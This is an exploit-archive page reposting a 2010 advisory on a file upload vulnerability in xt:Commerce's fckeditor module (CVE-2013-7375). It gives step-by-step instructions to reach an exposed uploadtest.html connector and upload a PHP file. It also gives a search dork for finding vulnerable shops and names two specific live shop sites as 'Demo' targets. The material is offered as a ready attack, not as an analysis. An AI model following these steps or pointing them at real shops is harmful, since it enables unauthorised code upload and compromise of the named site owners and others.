Advertisement






xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability

CVE Category Price Severity
CVE-2013-7375 CWE-434 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2010-11-16
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010110039

Below is a copy:

============================================================= 
xt:Commerce Shopsoftware (fckeditor) File Upload Vulnerability 
============================================================= 
################################################### 
# 
# Exploit Title: xt:Commerce Shopsoftware (fckeditor)
# Date: 08/11/2010
# Author: Net.Edit0r 
# Software Link: www.xt-commerce.com/
# Version: 3 & 4 
# Tested on: Linux Ubuntu 9.04 
# dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
# Contact: [email protected] ~ [email protected] 
# 
#################################################### 
  
    exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
first go to # http://site.com/[shop] 
  
       then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
     select # Select the "File Uploader"> php ... upload to : Uploaded File URL: 
  
Demo : http://www.figuactiv-onlineshop.net/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html

Demo : http://ps-oberlausitz.de/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
  
####################################################### 
  
Home : datacoders.org ~ ajaxtm.com #Iranian HackerZ 
  
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
  
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , Zalatan , P0W3RFU7
       BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ B3hz4d ~ Raiden ~ m4hd1

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.